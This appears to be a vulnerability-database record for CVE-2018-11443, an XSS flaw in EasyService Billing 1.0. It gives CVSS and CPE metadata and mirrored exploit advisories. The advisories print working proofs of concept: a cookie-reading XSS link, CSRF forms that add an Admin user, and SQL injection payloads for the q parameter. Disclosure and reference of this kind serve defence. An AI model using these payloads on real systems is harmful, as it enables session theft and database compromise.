ID CVE-2018-11443
Type cve
Reporter cve@mitre.org
Modified 2018-06-25T21:54:00
Description
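The q parameter of jobcard-ongoing.php in EasyService Billing 1.0 is vulnerable to cross-site scripting (XSS, CWE-79). Exploitation requires a user to open a crafted link (CVSS v3 UI:R), and this record lists no fixed version. The referenced Packet Storm advisory also reports SQL injection through the same q parameter, tracked separately as CVE-2018-11444, so handling of q needs both output encoding and parameterized queries.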
{"id": "CVE-2018-11443", "bulletinFamily": "NVD", "title": "CVE-2018-11443", "description": "The parameter q is affected by Cross-site Scripting in jobcard-ongoing.php in EasyService Billing 1.0.", "published": "2018-05-25T12:29:00", "modified": "2018-06-25T21:54:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-11443", "reporter": "cve@mitre.org", "references": ["https://www.exploit-db.com/exploits/44764/", "https://gist.github.com/NinjaXshell/be613dab99601f6abce884f6bc3d83a8"], "cvelist": ["CVE-2018-11443"], "type": "cve", "lastseen": "2020-10-03T13:20:10", "edition": 3, "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "exploitpack", "idList": ["EXPLOITPACK:6F2E7EA39EE83E4C8FCCE3DDBD058D0E"]}, {"type": "exploitdb", "idList": ["EDB-ID:44764"]}, {"type": "zdt", "idList": ["1337DAY-ID-30487"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:147905"]}], "modified": "2020-10-03T13:20:10", "rev": 2}, "score": {"value": 3.5, "vector": "NONE", "modified": "2020-10-03T13:20:10", "rev": 2}, "vulnersScore": 3.5}, "cpe": ["cpe:/a:easyservice_billing_project:easyservice_billing:1.0"], "affectedSoftware": [{"cpeName": "easyservice_billing_project:easyservice_billing", "name": "easyservice billing project easyservice billing", "operator": "eq", "version": "1.0"}], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": 
"MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "cpe23": ["cpe:2.3:a:easyservice_billing_project:easyservice_billing:1.0:*:*:*:*:*:*:*"], "cwe": ["CWE-79"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:easyservice_billing_project:easyservice_billing:1.0:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}}
{"zdt": [{"lastseen": "2018-05-30T01:05:38", "description": "Exploit for php platform in category web applications", "edition": 1, "published": "2018-05-29T00:00:00", "title": "EasyService Billing 1.0 - Cross-Site Scripting Vulnerability", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-11443"], "modified": "2018-05-29T00:00:00", "id": "1337DAY-ID-30487", "href": "https://0day.today/exploit/description/30487", "sourceData": "<!--\r\n# Exploit Title: EasyService Billing 1.0 Cross-Site Scripting in 'q' Parameter\r\n# Software Link: https://codecanyon.net/item/easyservice-billing-php-scripts-for-quotation-invoice-payments-etc/16687594 \r\n# Exploit Author: Divya Jain\r\n# Version: EasyService Billing 1.0 \r\n# CVE: CVE-2018-11443\r\n# Category: Webapps\r\n# Severity: Medium\r\n# Tested on: KaLi LinuX_x64\r\n# # # # #\r\n# \r\n# Proof of Concept:\r\n#\r\n ///////////\r\n // XSS //\r\n ///////////\r\n \r\n Affected Link: http://test.com/EasyServiceBilling/jobcard-ongoing.php?q=\r\n Payload: %27%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%27\r\n Parameter: q\r\n Link: http://test.com/EasyServiceBilling/jobcard-ongoing.php?q=%27%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%27\r\n \r\n ###########################################################################\n\n# 0day.today [2018-05-30] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30487"}], "exploitdb": [{"lastseen": "2018-05-28T00:30:41", "description": "EasyService Billing 1.0 - Cross-Site Scripting. CVE-2018-11443. 
Webapps exploit for PHP platform", "published": "2018-05-26T00:00:00", "type": "exploitdb", "title": "EasyService Billing 1.0 - Cross-Site Scripting", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-11443"], "modified": "2018-05-26T00:00:00", "id": "EDB-ID:44764", "href": "https://www.exploit-db.com/exploits/44764/", "sourceData": "<!--\r\n# Exploit Title: EasyService Billing 1.0 Cross-Site Scripting in 'q' Parameter\r\n# Date: 25-05-2018\r\n# Software Link: https://codecanyon.net/item/easyservice-billing-php-scripts-for-quotation-invoice-payments-etc/16687594 \r\n# Exploit Author: Divya Jain\r\n# Version: EasyService Billing 1.0 \r\n# CVE: CVE-2018-11443\r\n# Category: Webapps\r\n# Severity: Medium\r\n# Tested on: KaLi LinuX_x64\r\n# # # # #\r\n# \r\n# Proof of Concept:\r\n#\r\n ///////////\r\n // XSS //\r\n ///////////\r\n \r\n Affected Link: http://test.com/EasyServiceBilling/jobcard-ongoing.php?q=\r\n Payload: %27%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%27\r\n Parameter: q\r\n Link: http://test.com/EasyServiceBilling/jobcard-ongoing.php?q=%27%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%27\r\n \r\n ###########################################################################", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/44764/"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:13", "description": "\nEasyService Billing 1.0 - Cross-Site Scripting", "edition": 1, "published": "2018-05-26T00:00:00", "title": "EasyService Billing 1.0 - Cross-Site Scripting", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-11443"], "modified": "2018-05-26T00:00:00", "id": "EXPLOITPACK:6F2E7EA39EE83E4C8FCCE3DDBD058D0E", "href": "", "sourceData": "<!--\n# Exploit Title: EasyService Billing 1.0 Cross-Site Scripting in 'q' Parameter\n# Date: 25-05-2018\n# Software Link: https://codecanyon.net/item/easyservice-billing-php-scripts-for-quotation-invoice-payments-etc/16687594 \n# 
Exploit Author: Divya Jain\n# Version: EasyService Billing 1.0 \n# CVE: CVE-2018-11443\n# Category: Webapps\n# Severity: Medium\n# Tested on: KaLi LinuX_x64\n# # # # #\n# \n# Proof of Concept:\n#\n ///////////\n // XSS //\n ///////////\n \n Affected Link: http://test.com/EasyServiceBilling/jobcard-ongoing.php?q=\n Payload: %27%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%27\n Parameter: q\n Link: http://test.com/EasyServiceBilling/jobcard-ongoing.php?q=%27%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%27\n \n ###########################################################################", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "packetstorm": [{"lastseen": "2018-05-29T09:48:54", "description": "", "published": "2018-05-26T00:00:00", "type": "packetstorm", "title": "EasyService Billing 1.0 CSRF / XSS / SQL Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-11443", "CVE-2018-11442", "CVE-2018-11444", "CVE-2018-11445"], "modified": "2018-05-26T00:00:00", "id": "PACKETSTORM:147905", "href": "https://packetstormsecurity.com/files/147905/EasyService-Billing-1.0-CSRF-XSS-SQL-Injection.html", "sourceData": "`Exploit 1 of 3: \n \n<!-- \n# Exploit Title: EasyService Billing 1.0 Multiple Cross-Site Request Forgery \n# Date: 25-05-2018 \n# Software Link: https://codecanyon.net/item/easyservice-billing-php-scripts-for-quotation-invoice-payments-etc/16687594 \n# Exploit Author: Divya Jain \n# Version: EasyService Billing 1.0 \n# CVE: CVE-2018-11445,CVE-2018-11442 \n# Category: Webapps \n# Severity: Medium \n# Tested on: KaLi LinuX_x64 \n# # # # # # # # \n# \n# Proof of Concept: \n////////////////////////// \n/ CSRF in Quotation Page / \n////////////////////////// \n# Initial Request: \n \nPOST /EasyServiceBilling/quotation-new3-new2.php?add=true&id=139 HTTP/1.1 \nHost: test.com \nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 \nAccept: 
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nReferer: http://test.com/EasyServiceBilling/quotation-new3-new2.php?add=true&id=139 \nCookie: tntcon=5078855aa89b90f68de5644f75495364a4xn; PHPSESSID=58bf7e8rf0jpiepg3iu7larrj2 \nConnection: close \nUpgrade-Insecure-Requests: 1 \nContent-Type: application/x-www-form-urlencoded \nContent-Length: 86 \n \nquotation_id=139"ation_no=249&des=test&button=Save&MM_update=form1&MM_insert=form1 \n \n# CSRF POC: \n \n<html> \n<body> \n<script>history.pushState('', '', '/')</script> \n<form action=\"http://test.com/EasyServiceBilling/quotation-new3-new2.php?add=true&id=139\" method=\"POST\"> \n<input type=\"hidden\" name=\"quotation_id\" value=\"139\" /> \n<input type=\"hidden\" name=\"quotation_no\" value=\"249\" /> \n<input type=\"hidden\" name=\"des\" value=\"testnew\" /> \n<input type=\"hidden\" name=\"button\" value=\"Save\" /> \n<input type=\"hidden\" name=\"MM_update\" value=\"form1\" /> \n<input type=\"hidden\" name=\"MM_insert\" value=\"form1\" /> \n<input type=\"submit\" value=\"Submit request\" /> \n</form> \n</body> \n</html> \n \n/////////////////////////// \n// CSRF in User Add Page // \n/////////////////////////// \n \n# Initial Request \n \nPOST /EasyServiceBilling/system-settings-user-new2.php? 
HTTP/1.1 \nHost: test.com \nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nReferer: http://test.com/EasyServiceBilling/system-settings-user-new2.php \nCookie: tntcon=ea1c7cc27fc02e6abf755d54fa60a8a8a4xn; PHPSESSID=kao38vbne4c4s9s0587o8h99e6 \nConnection: close \nUpgrade-Insecure-Requests: 1 \nContent-Type: application/x-www-form-urlencoded \nContent-Length: 36 \n \ntype=Admin&un=a&pw=b&MM_insert=form1 \n \n# CSRF POC \n \n<html> \n<body> \n<script>history.pushState('', '', '/')</script> \n<form action=\"http://test.com/EasyServiceBilling/system-settings-user-new2.php?\" method=\"POST\"> \n<input type=\"hidden\" name=\"type\" value=\"Admin\" /> \n<input type=\"hidden\" name=\"un\" value=\"adminTest\" /> \n<input type=\"hidden\" name=\"pw\" value=\"adminTest\" /> \n<input type=\"hidden\" name=\"MM_insert\" value=\"form1\" /> \n<input type=\"submit\" value=\"Submit request\" /> \n</form> \n</body> \n</html> \n \n--> \n \nExploit 2 of 3: \n \n<!-- \n# Exploit Title: EasyService Billing 1.0 Cross-Site Scripting in 'q' Parameter \n# Date: 25-05-2018 \n# Software Link: https://codecanyon.net/item/easyservice-billing-php-scripts-for-quotation-invoice-payments-etc/16687594 \n# Exploit Author: Divya Jain \n# Version: EasyService Billing 1.0 \n# CVE: CVE-2018-11443 \n# Category: Webapps \n# Severity: Medium \n# Tested on: KaLi LinuX_x64 \n# # # # # \n# \n# Proof of Concept: \n# \n/////////// \n// XSS // \n/////////// \n \nAffected Link: http://test.com/EasyServiceBilling/jobcard-ongoing.php?q= \nPayload: %27%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%27 \nParameter: q \nLink: http://test.com/EasyServiceBilling/jobcard-ongoing.php?q=%27%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%27 \n \n########################################################################### \n \n \n 
\nExploit 3 of 3: \n \n<!-- \n# Exploit Title: EasyService Billing 1.0 SQL Injection on page jobcard-ongoing.php?q= \n# Date: 25-05-2018 \n# Software Link: https://codecanyon.net/item/easyservice-billing-php-scripts-for-quotation-invoice-payments-etc/16687594 \n# Exploit Author: Divya Jain \n# Version: EasyService Billing 1.0 \n# CVE: CVE-2018-11444 \n# Category: Webapps \n# Severity: High \n# Tested on: KaLi LinuX_x64 \n# # # # # # # # \n# \n \n# Proof of Concept: \n//////////////////////////////// \nSQL Injection in q parameter \n/////////////////////////////// \nAffected Link: test.com/EasyServiceBilling/jobcard-ongoing.php?q= \n# Boolean Based Blind SQL \nPayload: 1337'OR%20NOT 1=1-- \nLink: test.com/EasyServiceBilling/jobcard-ongoing.php?q=1337'OR%20NOT 1=1-- \n \n# Error-Based SQL \nPayload: 1337'AND%20(SELECT%202%20FROM(SELECT%20COUNT(*),CONCAT(0x7162627161,(SELECT(ELT(2=2,1))),0x717a6b6271,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)%20AND%20'aBCD'='aBCD \n \nLink: test.com/EasyServiceBilling/jobcard-ongoing.php?q=1337'AND%20(SELECT%202%20FROM(SELECT%20COUNT(*),CONCAT(0x7162627161,(SELECT(ELT(2=2,1))),0x717a6b6271,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)%20AND%20'aBCD'='aBCD \n################################# \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/147905/easybilling10-sqlxssxsrf.txt"}]}